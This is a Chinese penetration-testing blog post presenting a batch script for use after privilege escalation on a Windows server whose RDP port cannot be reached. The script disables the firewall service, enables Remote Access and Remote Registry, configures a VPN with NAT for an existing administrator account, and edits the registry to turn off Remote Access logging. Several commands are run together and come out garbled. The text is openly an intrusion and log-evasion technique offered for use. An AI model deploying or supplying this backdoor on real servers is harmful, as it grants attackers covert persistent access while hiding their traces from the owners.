您的位置 » 首页 » 渗透测试 » 3389终端建VPN淫荡连接方法

3389终端建VPN淫荡连接方法

发表于5年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2012年06月22日 | 文章热度:10,751 次 全屏阅读

显示不全请点击全屏阅读

我们经常遇到服务器开了3389,又是外网IP,又终端不了, 今天看到一个比较淫荡的方法,就是用提权工具执行一个建立vpn的批处理,然后再通过内网IP访问服务器

命令行开VPN批处理(BAT):

@echooff
rem 设置服务

sc config sharedaccess start=disabled
net stop SharedAccess
sc config remoteaccess start=auto
net start RemoteAccess
net start lanmanserver
net start RemoteRegistry

rem 开启VPN

netsh rasset uservpnuser permit rem vpnuser改成已存在的某个账户,比如administrator
netsh ras ip add range10.10.1.1 10.10.10.10rem 设置地址池的范围,比如192.168.111.1 192.168.111.11
netsh ras ipset addrassignpool
netsh routing ip nat install
netsh routing ip nat add interface 本地连接 full rem”本地连接”可能是其他名称,最好先ipconfig确认下
netsh routing ip nat add interface 内部 private

netsh routing ip igmp install
netsh routing ip igmp add interface 内部 igmpprototype=IGMPRTRV3ifenabled=enable

robustvar=2startupquerycount=2startupqueryinterval=31genqueryinterval=125

genqueryresptime=10lastmemquerycount=2lastmemqueryinterval=1000accnonrtralertpkts=YES
netsh routing ip igmp add interface name=”本地连接”igmpprototype=IGMPPROXY ifenabled=enable

rem 隐藏日志

Windows Registry Editor Version5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRemoteAccessParameters]
“LoggingFlags”=dword:00000000

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRasManParameters]
“ProhibitIPsec”=dword:00000001

将以上代码保存为bat文件在命令行下执行,前提是至少有administrator权限。成功开启后会打开TCP的1723端口

来源:http://www.cnhkfx.com/?p=555

Tags:

3389,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/349/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有2个筒子的人留下了脚印...

  • DK'don 说:
    1楼
    2012 年 7 月 2 日 下午 12:16 回复

    :sad: 射射楼主! :mrgreen:

  • 【管理员】Seay 说:
    2楼
    2012 年 7 月 2 日 下午 2:00 回复

    👿 对了,苍姐姐托我给你传个信,说叫你今晚跟她去拍电影…

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)